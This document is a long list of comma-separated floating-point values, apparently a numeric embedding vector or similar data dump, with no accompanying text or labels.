0.007904539816081524, 0.03417474403977394, 0.03666176274418831, -0.017191722989082336, -0.04375758767127991, 0.0035805217921733856, 0.0037783528678119183, -0.003926182631403208, -0.025357138365507126, 0.017774345353245735, -0.05311433598399162, -0.01045242790132761, -0.014313391409814358, -0.011095922440290451, -0.02685282751917839, 0.033687774091959, -0.008256722241640091, -0.0014348175609484315, 0.003952269908040762, -0.029705069959163666, 0.005313172470778227, 0.024609293788671494, 0.006321893073618412, 0.020817898213863373, -0.008717603050172329, -0.014269912615418434, 0.03340950980782509, 0.018609147518873215, 0.005726226139813662, 0.019200466573238373, -0.006147975567728281, 0.02222662791609764, -0.006961038801819086, -0.06316675245761871, 0.003084857715293765, 0.014069907367229462, 0.019878745079040527, -0.04636634513735771, 0.014756880700588226, -0.0034935632720589638, 0.0030631180852651596, 0.0035522603429853916, 0.013139449991285801, 0.0018489579670131207, -0.00015054714458528906, -0.018870024010539055, 0.004097925964742899, 0.007500182371586561, -0.03335733339190483, -0.04803594946861267, 0.017713474109768867, 0.011217663995921612, 0.01953090913593769, -0.016174307093024254, -0.02415710873901844, 0.049288153648376465, -0.04876640439033508, -0.008239330723881721, -0.009321966208517551, -0.004582720343023539, 0.00028723524883389473, -0.0008674124255776405, -0.02718327008187771, -0.021913576871156693, 0.004678374622017145, -0.03958357125520706, 0.035131290555000305, -0.05022730678319931, -0.008043673820793629, 0.009156743995845318, -0.008839345537126064, -0.022383153438568115, 0.013400325551629066, -0.008669775910675526, -0.00597840640693903, 0.009426316246390343, -0.015435158275067806, 0.047653332352638245, 0.009408924728631973, 0.017469990998506546, -0.05029687657952309, 0.0006924081244505942, -0.0391661711037159, 0.00004133932088734582, -0.007487138733267784, -0.014887318946421146, 0.007739318534731865, -0.0010935048339888453, -0.010139376856386662, 0.01954830065369606, 0.0014022079994902015, 0.012809007428586483, -0.0019283078145235777, 0.035966090857982635, 0.0228179469704628, 0.0010625257855281234, 0.0002697076415643096, 0.011226359754800797, 0.013374238274991512, 0.021635308861732483, 0.005347955971956253, -0.0017359118210151792, -0.019600477069616318, 0.04890553653240204, -0.00006572849815711379, -0.00312616303563118, -0.0499490424990654, 0.022939687594771385, 0.02361796610057354, 0.010878525674343109, 0.005961014423519373, -0.016348224133253098, 0.020313536748290062, -0.010791567154228687, -0.009348053485155106, -0.006095800548791885, 0.014974277466535568, -0.05085340887308121, 0.034366052597761154, -0.007439311593770981, -0.013443805277347565, -0.00542621873319149, 0.02227880246937275, -0.03478345647454262, 0.02121790684759617, -0.043514102697372437, 0.015948213636875153, 0.051444727927446365, -0.03634871169924736, -0.004054446239024401, 0.020800506696105003, -0.010965484194457531, -0.001257639261893928, -0.036279141902923584, -0.03318341448903084, -0.0298268124461174, 0.026191940531134605, -0.046018511056900024, -0.05509699136018753, -0.016913454979658127, 0.053879570215940475, -0.045461975038051605, -0.014730793423950672, 0.001045134151354432, -0.0016989543801173568, 0.022730987519025803, -0.03993140533566475, 0.0460880771279335, -0.0106002576649189, 0.010148072615265846, 0.02659195102751255, -0.0036892201751470566, -0.005339260213077068, 0.025965848937630653, 0.0073697445914149284, 0.0007348004728555679, -0.004826204385608435, -0.014696009457111359, 0.005204474553465843, 0.028557216748595238, 0.01574820838868618, 0.009513274766504765, 0.028905050829052925, -0.02547888085246086, 0.03801831603050232, 0.019617868587374687, -0.03780961409211159, -0.018852632492780685, 0.005447958596050739, 0.051757778972387314, 0.009243703447282314, -0.0053175208158791065, 0.0011391581501811743, 0.023565789684653282, -0.03533998876810074, -0.0008907825103960931, 0.012261168099939823, 0.011495932005345821, -0.008913259953260422, 0.0336008183658123, -0.012695960700511932, -0.0263658594340086, -0.035148680210113525, -0.00021875531820114702, -0.005987102165818214, -0.006026233546435833, 0.04664461314678192, 0.0048044645227491856, 0.018609147518873215, 0.030609440058469772, -0.03356603533029556, -0.0357573926448822, -0.03179207816720009, 0.009191527962684631, -0.013139449991285801, 0.02603541500866413, 0.028139814734458923, 0.007213219068944454, 0.00830020196735859, -0.024922344833612442, 0.005587092600762844, 0.007978455163538456, 0.009913284331560135, 0.04640112817287445, 0.009148048236966133, -0.026191940531134605, -0.004326192196458578, 0.004952294286340475, 0.007978455163538456, 0.05217518284916878, 0.0033305156975984573, -0.03687046095728874, -0.024296242743730545, 0.0036587845534086227, -0.01876567304134369, -0.008091500960290432, -0.003943574149161577, 0.014452525414526463, 0.017748257145285606, -0.006956690922379494, 0.020470062270760536, 0.0032848624978214502, -0.04946207255125046, -0.011704632081091404, -0.047340281307697296, -0.02121790684759617, -0.01822653040289879, -0.04281843453645706, -0.0010842655319720507, -0.01713085174560547, -0.016435181722044945, -0.007178435567766428, 0.004839248023927212, -0.005508829839527607, 0.034331269562244415, 0.00597840640693903, -0.007034953683614731, 0.016330832615494728, -0.017235200852155685, 0.02337448112666607, -0.000552187324501574, -0.01127853523939848, -0.007421919610351324, 0.04361845180392265, 0.036557409912347794, -0.011452452279627323, -0.0035087810829281807, 0.03537477180361748, -0.005695790518075228, 0.02304403856396675, -0.028365908190608025, -0.012113338336348534, 0.05843620374798775, -0.039792273193597794, -0.002726153237745166, -0.01657431572675705, -0.03419213742017746, 0.014617746695876122, -0.033809516578912735, -0.04831421747803688, -0.039792273193597794, -0.01953090913593769, 0.003265296807512641, 0.012635089457035065, -0.012548130936920643, -0.024539727717638016, -0.014417742379009724, 0.002130486536771059, 0.026713693514466286, -0.010130681097507477, 0.04535762593150139, 0.025113653391599655, -0.00251310458406806, 0.04525327309966087, -0.01020024809986353, -0.023270132020115852, -0.031322501599788666, -0.003821832127869129, 0.0510273277759552, -0.017035197466611862, 0.021374432370066643, -0.007065389305353165, -0.013043795712292194, -0.0022196192294359207, -0.023757100105285645, -0.004347932059317827, 0.027774589136242867, -0.015391678549349308, -0.01628735288977623, -0.039479222148656845, 0.005452306475490332, 0.023704923689365387, 0.010061114095151424, 0.01605256460607052, 0.012017683126032352, 0.03826180100440979, -0.012956837192177773, -0.001367424614727497, 0.01796565391123295, -0.003650088794529438, 0.026539776474237442, -0.008108892478048801, 0.030209429562091827, 0.015452549792826176, 0.011869854293763638, -0.01712215505540371, 0.01653953269124031, 0.024017974734306335, 0.007421919610351324, 0.02010483667254448, -0.006930603180080652, -0.005569700617343187, 0.019461343064904213, -0.017983045428991318, -0.013878598809242249, 0.031896427273750305, 0.013939469121396542, 0.01822653040289879, 0.0019652652554214, 0.03212251886725426, 0.03860963508486748, 0.044383689761161804, 0.004778377246111631, -0.008721951395273209, -0.012556826695799828, 0.03902703523635864, -0.024591902270913124, 0.0029392018914222717, 0.012548130936920643, 0.009974155575037003, -0.0005024579004384577, -0.019913528114557266, -0.012991620227694511, -0.02900940179824829, -0.030522480607032776, -0.015800384804606438, 0.008548034355044365, -0.0016163436230272055, -0.023217955604195595, 0.019704826176166534, -0.012939444743096828, -0.0026196290273219347, 0.04584459215402603, 0.015539508312940598, -0.00475228950381279, -0.010800262913107872, 0.041148826479911804, 0.004991425666958094, -0.03010508045554161, -0.022417936474084854, 0.014609050936996937, 0.01659170724451542, -0.0013880772748962045, -0.023513615131378174, 0.029739852994680405, -0.009982851333916187, 0.020470062270760536, 0.06194933131337166, -0.005391435697674751, -0.0011261143954470754, 0.006491462234407663, 0.01328727975487709, 0.003974009770900011, -0.005169691052287817, 0.004587068222463131, 0.019722219556570053, -0.03507911413908005, 0.023130998015403748, -0.004126187413930893, 0.009156743995845318, 0.029531152918934822, -0.0007217566599138081, -0.015626467764377594, 0.00013811477401759475, -0.01182637456804514, -0.029478978365659714, 0.00487837940454483, -0.013861206360161304, -0.019461343064904213, -0.007295829709619284, 0.002204401418566704, 0.02633107453584671, -0.008234983310103416, 0.0028761569410562515, -0.030348563566803932, -0.014269912615418434, 0.014191649854183197, -0.019722219556570053, 0.016443878412246704, -0.01899176649749279, 0.02198314294219017, -0.007348004728555679, -0.003187034046277404, 0.02085268124938011, 0.005987102165818214, -0.029113750904798508, -0.0053740437142550945, -0.004482717718929052, 0.02059180475771427, 0.00787845253944397, -0.0127568319439888, 0.007300177589058876, 0.03972270339727402, 0.009495883248746395, -0.044905439019203186, -0.02930506132543087, -0.026452817022800446, -0.008108892478048801, -0.00012214970774948597, -0.01058286614716053, -0.010678520426154137, -0.022400544956326485, -0.009565450251102448, 0.0012369866017252207, 0.0009951329557225108, 0.03097466565668583, -0.02742675319314003, 0.017252594232559204, -0.02172226831316948, -0.009269790723919868, -0.00009409196354681626, 0.0005576222320087254, 0.0036218271125108004, -0.014896014705300331, -0.005126211792230606, 0.013722073286771774, -0.011461148038506508, 0.00500881765037775, -0.0011261143954470754, -0.019217858090996742, 0.005500133614987135, -0.006300153210759163, -0.015617771074175835, 0.0050870804116129875, -0.03878355026245117, 0.031392067670822144, 0.009043698199093342, 0.010591561906039715, 0.008039326407015324, 0.010026331059634686, -0.02040049619972706, 0.022591853514313698, 0.008717603050172329, -0.006713206879794598, -0.03240078687667847, -0.025322355329990387, 0.004874031525105238, 0.009191527962684631, 0.0017467816360294819, 0.010174160823225975, 0.01982656866312027, 0.004947946406900883, -0.0036392188630998135, 0.009678496047854424, 0.0034609537106007338, -0.01958308555185795, 0.02471364475786686, -0.0005793619202449918, 0.011374189518392086, -0.016713449731469154, -0.004321844317018986, 0.0072740898467600346, -0.02819198928773403, -0.022974472492933273, 0.006165367551147938, -0.022070102393627167, -0.03372256085276604, -0.021930968388915062, -0.02473103627562523, 0.0006375155062414706, 0.009835021570324898, -0.01033068634569645, -0.013113362714648247, 0.015426462516188622, 0.007413223851472139, -0.0314442440867424, -0.020574413239955902, -0.00010210846085101366, 0.018556972965598106, -0.029670286923646927, 0.008708907291293144, 0.013061187230050564, -0.019757002592086792, 0.02493973635137081, 0.007852365262806416, 0.030052904039621353, 0.003956617787480354, -0.018087396398186684, -0.027583278715610504, -0.005069688428193331, -0.0047914208844304085, -0.01577429659664631, 0.008891521021723747, -0.019217858090996742, 0.0022891859989613295, 0.02874852530658245, -0.024817995727062225, -0.010539386421442032, -0.056905731558799744, 0.023217955604195595, -0.0006179498159326613, 0.04852291941642761, 0.004313148558139801, 0.01493079774081707, 0.001655475003644824, 0.014478612691164017, -0.0007641490083187819, -0.0014782968210056424, 0.01658301241695881, 0.031896427273750305, -0.009817630052566528, 0.0303659550845623, -0.018417838960886, 0.018556972965598106, -0.021235298365354538, -0.003573999973013997, -0.010548082180321217, -0.01631344109773636, -0.02499191276729107, 0.02603541500866413, 0.013330758549273014, -0.03262688219547272, -0.029965946450829506, 0.0029174622613936663, -0.0011706806253641844, -0.03561825677752495, -0.002991377143189311, -0.06017537787556648, 0.028087640181183815, 0.005474046338349581, -0.015826471149921417, -0.004717506002634764, -0.014426438137888908, 0.012104642577469349, 0.008656732738018036, 0.0003771830815821886, -0.02008744515478611, 0.05130559578537941, -0.01740042306482792, 0.017443902790546417, -0.013774247840046883, 0.01233943086117506, 0.008756734430789948, -0.010130681097507477, 0.0024478856939822435, 0.040314022451639175, 0.01579168811440468, -0.01449600514024496, -0.015096019022166729, -0.006608856376260519, -0.004634895361959934, 0.0016228655586019158, 0.00563926761969924, -0.022070102393627167, 0.017739562317728996, -0.014287304133176804, -0.009982851333916187, 0.022470111027359962, 0.00937414076179266, 0.013887294568121433, 0.0042218416929244995, -0.00420445017516613, -0.009956764057278633, 0.00521751819178462, 0.04121839255094528, -0.013756856322288513, 0.02220923639833927, 0.015878647565841675, -0.012765527702867985, 0.005700138863176107, -0.02603541500866413, 0.0008641514577902853, 0.03537477180361748, 0.006382763851433992, 0.020226579159498215, -0.00325225293636322, 0.014269912615418434, -0.01815696246922016, 0.014896014705300331, -0.026261508464813232, 0.015626467764377594, 0.009000218473374844, 0.022939687594771385, -0.013922077603638172, 0.037357430905103683, -0.046296779066324234, -0.015374287031590939, -0.06706249713897705, -0.022104885429143906, 0.01869610697031021, -0.018417838960886, -0.0002597889397293329, -0.010965484194457531, 0.02172226831316948, 0.028939833864569664, 0.015956910327076912, 0.005587092600762844, -0.005956666544079781, 0.030887708067893982, -0.003454431891441345, -0.011591586284339428, -0.015835167840123177, -0.02038310468196869, 0.00779584189876914, -0.020139619708061218, 0.0406966432929039, 0.020730938762426376, -0.010487211868166924, -0.02227880246937275, 0.019965702667832375, -0.017826519906520844, 0.009217615239322186, -0.04264451563358307, -0.016896063461899757, -0.01736564002931118, 0.0027087614871561527, -0.03645306080579758, 0.02222662791609764, -0.007191479206085205, -0.034348662942647934, 0.011217663995921612, -0.01043503638356924, 0.010626344941556454, 0.012000291608273983, 0.0012956836726516485, -0.011722024530172348, 0.03493998199701309, -0.018539581447839737, -0.013374238274991512, 0.04361845180392265, -0.023826666176319122, 0.004930554889142513, -0.01466122642159462, -0.03833136707544327, -0.02170487493276596, 0.019635260105133057, 0.017522165551781654, -0.025965848937630653, -0.007121912203729153, 0.0076132286339998245, 0.01713085174560547, -0.022470111027359962, -0.05217518284916878, -0.025357138365507126, -0.013791639357805252, -0.003863137448206544, -0.0038718332070857286, 0.0228179469704628, -0.0046044597402215, -0.010461123660206795, 0.010704608634114265, -0.00013145699631422758, 0.009200223721563816, 0.019670043140649796, 0.013887294568121433, 0.021096164360642433, -0.018278704956173897, -0.0038892249576747417, -0.011069834232330322, -0.04292278364300728, 0.010000242851674557, -0.02363535761833191, 0.012400301173329353, 0.007808885537087917, 0.06215803325176239, -0.02443537674844265, 0.024922344833612442, 0.0037153076846152544, 0.027270227670669556, 0.023148389533162117, -0.02413971722126007, -0.01504384446889162, 0.02554844692349434, -0.008495858870446682, 0.008100196719169617, 0.01712215505540371, -0.00893934816122055, -0.008795865811407566, 0.004282712936401367, -0.0024304939433932304, -0.026487600058317184, -0.004882727283984423, -0.0060001458041369915, -0.007939323782920837, -0.026487600058317184, 0.023931017145514488, 0.002437015762552619, 0.009739367291331291, -0.00839150883257389, -0.015556899830698967, 0.010078505612909794, -0.00650450587272644, 0.009695887565612793, -0.007917583920061588, -0.02085268124938011, -0.005291433073580265, -0.019096117466688156, -0.037566132843494415, -0.01713954657316208, -0.0023957104422152042, 0.039444439113140106, -0.015435158275067806, 0.014374262653291225, -0.004830552265048027, -0.011426365002989769, 0.0006157758180052042, 0.018504798412322998, -0.0031761641148477793, -0.025026695802807808, 0.019635260105133057, 0.01794826239347458, -0.015617771074175835, 0.03179207816720009, -0.0019391776295378804, -0.015887342393398285, -0.009939372539520264, -0.0247484277933836, -0.02718327008187771, 0.03236600384116173, 0.0021076600532978773, 0.019878745079040527, 0.0018174354918301105, 0.004102273844182491, -0.011208968237042427, -0.019391775131225586, 0.0028870266396552324, -0.011974204331636429, 0.03885312005877495, -0.017652602866292, 0.019409168511629105, -0.0002807133423630148, 0.0233570896089077, 0.02172226831316948, -0.021339649334549904, 0.0002934854128398001, 0.028591999784111977, -0.0008326289243996143, 0.01381772756576538, -0.03549651429057121, 0.0149134062230587, -0.001502210390754044, 0.017426511272788048, 0.0018359142122790217, -0.01897437497973442, -0.04605329409241676, -0.027357187122106552, -0.023704923689365387, -0.0015696033369749784, -0.014009036123752594, 0.007978455163538456, 0.017791736871004105, 0.018835240975022316, -0.0020967901218682528, -0.01685258373618126, 0.020035270601511, 0.005904491525143385, -0.0014054689090698957, -0.005678399000316858, -0.030592048540711403, -0.030626831576228142, 0.016461269930005074, 0.00952197052538395, -0.01602647639811039, 0.01602647639811039, 0.04946207255125046, -0.006047973409295082, -0.012330735102295876, -0.007761058397591114, 0.00226962030865252, 0.0154960285872221, 0.038713984191417694, -0.012087250128388405, 0.02060919627547264, 0.028331123292446136, 0.024365810677409172, 0.008691515773534775, 0.004500109236687422, 0.027322404086589813, 0.0032413832377642393, -0.0030892055947333574, -0.021913576871156693, 0.03262688219547272, -0.04452282190322876, -0.021930968388915062, 0.017243897542357445, 0.02987898699939251, -0.001763086300343275, -0.04539240896701813, 0.00677842553704977, -0.009478491730988026, 0.0033370377495884895, 0.01954830065369606, 0.009721975773572922, -0.023774491623044014, -0.0036109574139118195, 0.008913259953260422, 0.017209114506840706, 0.045427192002534866, -0.0012924227630719543, -0.006317544728517532, -0.0021261386573314667, -0.00813498068600893, -0.0127568319439888, 0.02878330834209919, 0.009913284331560135, -0.009861109778285027, -0.028365908190608025, 0.011574194766581059, -0.034035611897706985, -0.035218246281147, -0.009121960960328579, 0.004947946406900883, 0.00177939108107239, 0.003541390411555767, 0.010287206619977951, 0.017269985750317574, -0.008052369579672813, -0.006217542570084333, -0.012269863858819008, 0.004665330983698368, -0.01600908488035202, 0.017565645277500153, 0.006769729778170586, -0.006387111730873585, -0.015035148710012436, 0.018017830327153206, -0.016435181722044945, 0.022713596001267433, 0.03010508045554161, -0.026661517098546028, -0.013513372279703617, -0.006895819678902626, -0.012156817130744457, 0.008400204591453075, -0.011139401234686375, -0.03128771856427193, -0.0014826447004452348, -0.008817605674266815, -0.01003502681851387, -0.05026209354400635, -0.022696204483509064, 0.029148535802960396, 0.09384576231241226, 0.009730671532452106, -0.013113362714648247, 0.012826398946344852, -0.011748111806809902, -0.009982851333916187, -0.008491510525345802, 0.004869683645665646, 0.015348199754953384, 0.0043153222650289536, 0.0214266087859869, 0.004306626506149769, -0.010695911943912506, -0.004834900144487619, 0.0018815675284713507, -0.009808934293687344, 0.00813498068600893, -0.017226506024599075, 0.011235055513679981, -0.003743569366633892, -0.005534917116165161, 0.009261094965040684, 0.017791736871004105, -0.018817849457263947, -0.004034880548715591, -0.007291481830179691, -0.018887415528297424, -0.009687191806733608, -0.010887221433222294, 0.0045609804801642895, -0.034574754536151886, 0.0035761739127337933, -0.005108819808810949, -0.0005929492181167006, -0.006695814896374941, -0.0008168676868081093, 0.03561825677752495, -0.0123742138966918, 0.014156865887343884, -0.03572260960936546, 0.004600111860781908, -0.006069712806493044, 0.004469674080610275, -0.01848740689456463, -0.0263658594340086, -0.009539362043142319, 0.038540069013834, 0.0074914866127073765, 0.002131573623046279, -0.022713596001267433, -0.006095800548791885, -0.03492258861660957, 0.011104618199169636, 0.028870267793536186, -0.010269815102219582, -0.001213073031976819, -0.005156646948307753, 0.002710935426875949, -0.010061114095151424, -0.02847025729715824, 0.004782725125551224, 0.0012587262317538261, 0.01954830065369606, 0.02198314294219017, 0.0015369938919320703, 0.003434866201132536, -0.04180971160531044, 0.006256673950701952, -0.010652433149516582, 0.011061138473451138, 0.006874080281704664, 0.001365250558592379, 0.02092224732041359, -0.0058349245227873325, 0.02582671493291855, 0.012835094705224037, -0.017296072095632553, 0.03123554214835167, -0.01796565391123295, -0.011895941570401192, 0.01925264298915863, 0.03013986349105835, -0.004063142463564873, -0.0077784499153494835, -0.0055392649956047535, 0.01740911975502968, -0.02034832164645195, 0.0003347907622810453, -0.013487285003066063, -0.009452403523027897, 0.006521897856146097, -0.015530812554061413, 0.004160970915108919, 0.009939372539520264, -0.005213170312345028, 0.010956788435578346, 0.02302664704620838, 0.015243848785758018, 0.007108868565410376, -0.014965581707656384, 0.006426243111491203, 0.01436556689441204, 0.01951351761817932, -0.003452257951721549, 0.004795768763870001, 0.027200661599636078, 0.00787845253944397, 0.014826447702944279, 0.021861400455236435, 0.01100026722997427, -0.015235153026878834, -0.0020804854575544596, 0.009695887565612793, -0.024087542667984962, -0.006291457451879978, -0.007082780823111534, 0.005630571860820055, 0.00935674924403429, 0.0106002576649189, -0.030522480607032776, -0.013365542516112328, -0.017748257145285606, 0.024522336199879646, -0.010191552340984344, 0.008691515773534775, 0.014539483934640884, -0.024017974734306335, -0.013548155315220356, 0.022470111027359962, 0.02659195102751255, 0.004182710312306881, 0.0027826763689517975, 0.010235031135380268, -0.004882727283984423, 0.03582695871591568, -0.011356798000633717, 0.024504944682121277, -0.02692239359021187, 0.001839175121858716, -0.011835070326924324, -0.012643786147236824, 0.020957032218575478, 0.013217712752521038, 0.02170487493276596, 0.017200417816638947, 0.001057090936228633, -0.002439189702272415, 0.015365591272711754, 0.029513761401176453, 0.025896282866597176, -0.008439335972070694, -0.012591610662639141, 0.023983191698789597, 0.027096310630440712, 0.0052523016929626465, -0.016383007168769836, 0.0029978989623486996, -0.010974179953336716, -0.018052613362669945, 0.00023370134294964373, 0.023270132020115852, 0.03801831603050232, 0.02521800436079502, -0.005213170312345028, 0.0045740241184830666, 0.025948457419872284, 0.007082780823111534, -0.0658450797200203, -0.01760042831301689, -0.021009206771850586, -0.006417547352612019, 0.008639340288937092, -0.021791834384202957, 0.010513299144804478, 0.03798353299498558, 0.03337472304701805, -0.020539630204439163, -0.01599169336259365, -0.004439238458871841, -0.02007005363702774, -0.000643493898678571, 0.005674051120877266, -0.023426657542586327, -0.020157011225819588, 0.024522336199879646, -0.031600769609212875, 0.007378440350294113, 0.011487236246466637, -0.042505379766225815, 0.02417450025677681, 0.014904710464179516, 0.02304403856396675, -0.012461172416806221, -0.03645306080579758, -0.020435279235243797, -0.008839345537126064, -0.00025272354832850397, -0.008643688634037971, 0.0018500449368730187, -0.019217858090996742, -0.010782871395349503, 0.010765478946268559, -0.007008865941315889, -0.006278413347899914, 0.02118312381207943, -0.02229619398713112, 0.002104399027302861, 0.0021380954422056675, 0.003910964820533991, -0.003356603439897299, -0.010826350189745426, 0.0067566861398518085, 0.007400179747492075, 0.005674051120877266, 0.02577454037964344, -0.006969734560698271, 0.006791469641029835, -0.005669703241437674, -0.0008386073750443757, 0.020783113315701485, 0.013522068038582802, 0.015939518809318542, 0.01219160109758377, -0.0011826374102383852, -0.03532259911298752, 0.02582671493291855, 0.03318341448903084, -0.027496321126818657, -0.017730865627527237, 0.0006570811965502799, -0.012026379816234112, -0.0006369720213115215, 0.03582695871591568, -0.00610449630767107, -0.00616971543058753, -0.010869829915463924, 0.01398294884711504, -0.002008744515478611, 0.03582695871591568, -0.04365323483943939, 0.012217688374221325, 0.00003488536094664596, -0.008574121631681919, 0.004904467146843672, -0.027461538091301918, -0.00040462941979058087, -0.004765333142131567, 0.02495712786912918, 0.012800311669707298, 0.03500954806804657, -0.020470062270760536, -0.000951110094320029, 0.0021978795994073153, 0.0019076550379395485, -0.0071958270855247974, 0.02692239359021187, 0.016078652814030647, -0.011982900090515614, 0.022174451500177383, -0.010643737390637398, 0.012635089457035065, -0.025878889486193657, 0.008321941830217838, -0.00733061321079731, -0.029392018914222717, 0.01603517308831215, -0.023739708587527275, -0.0030261606443673372, -0.03227904438972473, 0.0081523722037673, 0.0017717821756377816, 0.011330710723996162, -0.009261094965040684, -0.009069785475730896, -0.007691491395235062, -0.0006565377116203308, 0.019270034506917, -0.019670043140649796, -0.019496126100420952, 0.011339406482875347, 0.0078610610216856, 0.03528781607747078, 0.02198314294219017, -0.026452817022800446, 0.014861230738461018, 0.007956715300679207, -0.020191796123981476, -0.013382934033870697, -0.0037348733749240637, -0.017748257145285606, -0.003665306605398655, 0.012922053225338459, -0.023983191698789597, -0.0018587408121675253, 0.003660958493128419, 0.0212005153298378, -0.022435327991843224, 0.02768762968480587, -0.00033696473110467196, -0.005991450045257807, 0.016435181722044945, 0.006630596239119768, 0.02772241272032261, 0.011739416047930717, -0.006982778664678335, 0.01979178562760353, -0.01794826239347458, -0.025078870356082916, 0.007352352607995272, 0.008195851929485798, 0.01113070547580719, -0.011948117054998875, -0.006769729778170586, -0.02306143008172512, -0.008091500960290432, -0.007769754156470299, -0.02062658779323101, 0.009313269518315792, 0.0016435182187706232, -0.022626636549830437, 0.018504798412322998, -0.010687216185033321, -0.02361796610057354, -0.043792370706796646, -0.010026331059634686, -0.0016522140940651298, 0.006234934087842703, 0.007413223851472139, -0.0018620018381625414, -0.004674026742577553, 0.022678812965750694, 0.008139328099787235, 0.0020924422424286604, 0.005743618123233318, -0.0051870825700461864, 0.009861109778285027, -0.0008114327793009579, 0.011600282043218613, -0.001379381399601698, -0.014756880700588226, -0.030574657022953033, 0.054679591208696365, -0.017017805948853493, 0.007108868565410376, 0.01086113415658474, -0.012139425612986088, 0.017469990998506546, 0.008074109442532063, -0.006521897856146097, -0.031079016625881195, -0.03579217568039894, -0.0048479437828063965, 0.004132709000259638, 0.02034832164645195, 0.006487114354968071, 0.008000195026397705, 0.024574510753154755, 0.014669922180473804, -0.008543686009943485, -0.014852534979581833, -0.01709606871008873, -0.00214244332164526, 0.017061283811926842, 0.00644363509491086, -0.012556826695799828, 0.012765527702867985, -0.0106002576649189, 0.010148072615265846, -0.0077219270169734955, -0.018400447443127632, 0.0005728400428779423, 0.0032739925663918257, 0.004834900144487619, 0.010652433149516582, 0.009895892813801765, 0.0029370279517024755, 0.03502693772315979, -0.00665233563631773, -0.019374383613467216, 0.019374383613467216, 0.00530012883245945, 0.000996763352304697, 0.003052248153835535, -0.008713255636394024, -0.012382909655570984, -0.0014141647843644023, -0.007139304187148809, 0.014226432889699936, -0.019078724086284637, -0.0009429577039554715, 0.01659170724451542, -0.002241358859464526, 0.002847895259037614, 0.03610522672533989, -0.004826204385608435, -0.01507862750440836, 0.04344453662633896, 0.006791469641029835, -0.014322087168693542, -0.006904515903443098, 0.012165512889623642, 0.010608953423798084, -0.03140946105122566, 0.013609026558697224, 0.022591853514313698, -0.0015913430834189057, -0.016765624284744263, -0.023496223613619804, 0.02062658779323101, -0.010739391669631004, 0.05527091026306152, 0.01235682237893343, 0.021113557741045952, -0.015548204071819782, 0.002005483489483595, -0.003128336975350976, -0.034331269562244415, 0.0013609026791527867, -0.006426243111491203, 0.010956788435578346, -0.0024413636419922113, 0.0049783820286393166, -0.0009782846318557858, -0.006495810113847256, 0.02363535761833191, -0.00897413119673729, 0.016148218885064125, -0.020713547244668007, 0.004093577619642019, 0.04180971160531044, -0.010722000151872635, 0.024244068190455437, 0.016348224133253098, 0.011756807565689087, -0.001641344279050827, 0.015878647565841675, -0.011174185201525688, 0.004708810243755579, -0.020157011225819588, -0.011139401234686375, 0.010113289579749107, -0.002606585156172514, -0.012200296856462955, 0.004406629130244255, 0.011426365002989769, -0.005969710182398558, 0.0024739732034504414, 0.011869854293763638, -0.000521751819178462, -0.012261168099939823, 0.014722096733748913, -0.007904539816081524, -0.002128312597051263, 0.009017610922455788, -0.0019391776295378804, 0.005665355361998081, 0.013461196795105934, 0.013243800029158592, 0.0008070848416537046, 0.015513421036303043, 0.027583278715610504, -0.02038310468196869, 0.015887342393398285, -0.0005657746223732829, 0.010756783187389374, 0.013226408511400223, -0.008500206284224987, -0.02687021903693676, -0.0016685188747942448, -0.020296145230531693, 0.02389623410999775, 0.00013723160373046994, 0.004445760510861874, -0.014330782927572727, -0.004328366369009018, 0.009982851333916187, -0.00018913504027295858, -0.0016598229994997382, 0.014156865887343884, -0.022435327991843224, 0.028122423216700554, 0.02093963883817196, -0.0031826861668378115, -0.0005119689740240574, -0.004080533981323242, 0.049253370612859726, 0.01056547462940216, 0.018035221844911575, -0.008400204591453075, 0.010008938610553741, -0.0076784477569162846, 0.005378391593694687, -0.00813498068600893, 0.02796589769423008, 0.014591659419238567, 0.012017683126032352, -0.0008233895641751587, 0.026504991576075554, -0.004447934217751026, -0.0057784016244113445, 0.005256649572402239, 0.005369695834815502, -0.006243630312383175, -0.004582720343023539, 0.015513421036303043, -0.003891398897394538, -0.014087298884987831, -0.007156695704907179, 0.01043503638356924, -0.000981002114713192, 0.0009223050437867641, -0.003880529198795557, 0.004895771387964487, 0.028678959235548973, 0.00536534795537591, 0.00840890035033226, 0.001013068133033812, -0.00644363509491086, 0.002684847917407751, -0.026713693514466286, 0.006117539945989847, 0.011087225750088692, -0.021757051348686218, -0.018643932417035103, -0.014156865887343884, 0.00711756432428956, -0.02255707047879696, 0.020435279235243797, -0.002726153237745166, -0.007695839274674654, 0.008491510525345802, -0.011643761768937111, 0.000482892181025818, -0.025322355329990387, 0.012687264941632748, -0.009861109778285027, 0.022348370403051376, -0.003660958493128419, 0.019704826176166534, -0.025131046772003174, 0.005069688428193331, -0.018609147518873215, 0.014243824407458305, -0.0027370231691747904, 0.00420445017516613, 0.007004518061876297, 0.010217639617621899, -0.03038334846496582, -0.005452306475490332, -0.0036457409150898457, 0.015130802989006042, -0.007652360014617443, -0.0005793619202449918, -0.015574292279779911, -0.006347980350255966, 0.0117915915325284, 0.0031000752933323383, -0.0048044645227491856, 0.001272857072763145, 0.0070306058041751385, -0.004904467146843672, 0.005104471929371357, 0.013130754232406616, 0.004180536605417728, -0.018939591944217682, 0.015435158275067806, 0.014609050936996937, 0.023478832095861435, 0.0019304817542433739, -0.00910456944257021, 0.01683519221842289, -0.004778377246111631, -0.016678666695952415, -0.00009877957927528769, 0.00039321609074249864, -0.0012293776962906122, -0.015539508312940598, -0.016478661447763443, 0.018122179433703423, -0.0008146937470883131, 0.023478832095861435, 0.00376965687610209, -0.0038087882567197084, 0.0003160402993671596, -0.03537477180361748, -0.016513444483280182, 0.01467861793935299, -0.006161019206047058, -0.00447836983948946, 0.0016641708789393306, 0.018122179433703423, -0.008687167428433895, -0.018939591944217682, -0.014652530662715435, -0.02306143008172512, -0.015452549792826176, -0.01290466170758009, -0.000329899339703843, -0.003847919637337327, 0.035148680210113525, -0.007869756780564785, 0.014148170128464699, -0.010687216185033321, -0.015513421036303043, 0.0014652530662715435, 0.013469892553985119, -0.0017456946661695838, -0.0004812616971321404, -0.014843839220702648, -0.010617649182677269, 0.005534917116165161, -0.028174597769975662, -0.0031152931042015553, 0.0011565499007701874, -0.0023739708121865988, 0.006839296780526638, 0.021374432370066643, 0.006365372333675623, -0.00867847166955471, -0.027513712644577026, 0.02467886172235012, 0.0023370133712887764, 0.018504798412322998, 0.02278316207230091, -0.00038125927676446736, 0.002102225087583065, 0.013956861570477486, -0.018609147518873215, 0.007082780823111534, -0.0007494747405871749, -0.00022106515825726092, 0.017722170799970627, 0.0100176353007555, 0.01138288527727127, 0.0057131825014948845, 0.012522043660283089, 0.009165440686047077, -0.0007304525352083147, -0.01411338709294796, 